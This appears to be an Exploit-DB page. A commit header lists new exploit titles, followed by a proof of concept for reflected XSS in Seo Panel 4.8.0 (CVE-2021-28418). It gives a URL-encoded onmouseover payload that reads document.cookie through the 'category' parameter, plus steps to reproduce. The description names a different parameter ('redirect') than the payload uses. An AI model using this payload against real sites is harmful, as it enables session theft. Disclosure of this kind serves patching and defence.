b7bdc3f375
7 changes to exploits/shellcodes Intel(R) Audio Service x64 01.00.1080.0 - 'IntelAudioService' Unquoted Service Path Thecus N4800Eco Nas Server Control Panel - Comand Injection Apache Airflow 1.10.10 - 'Example Dag' Remote Code Execution GetSimple CMS 3.3.4 - Information Disclosure Products.PluggableAuthService 2.6.0 - Open Redirect Seo Panel 4.8.0 - 'search_name' Reflected XSS Seo Panel 4.8.0 - 'category' Reflected XSS
21 lines
No EOL
762 B
Text
21 lines
No EOL
762 B
Text
# Exploit Title: Seo Panel 4.8.0 - 'category' Reflected XSS
|
|
# Date: 22-03-2021
|
|
# Exploit Author: Piyush Patil
|
|
# Vendor Homepage: https://www.seopanel.org/
|
|
# Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0
|
|
# Version: Seo Panel 4.8.0
|
|
# Tested on: Windows 10 and Kali
|
|
# CVE : CVE-2021-28418
|
|
|
|
|
|
-Description:
|
|
A cross-site scripting (XSS) issue in the SEO admin login panel version 4.8.0 allows remote attackers to inject JavaScript via the "redirect" parameter.
|
|
|
|
-Payload used:
|
|
x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22
|
|
|
|
-Steps to reproduce:
|
|
1- Login to SEO admin panel
|
|
2- Visit:
|
|
http://localhost/settings.php?category=x%22%20onmouseover%3dalert(document.cookie)%20x%3d%22
|
|
3- Hover your mouse to "Cancel" field |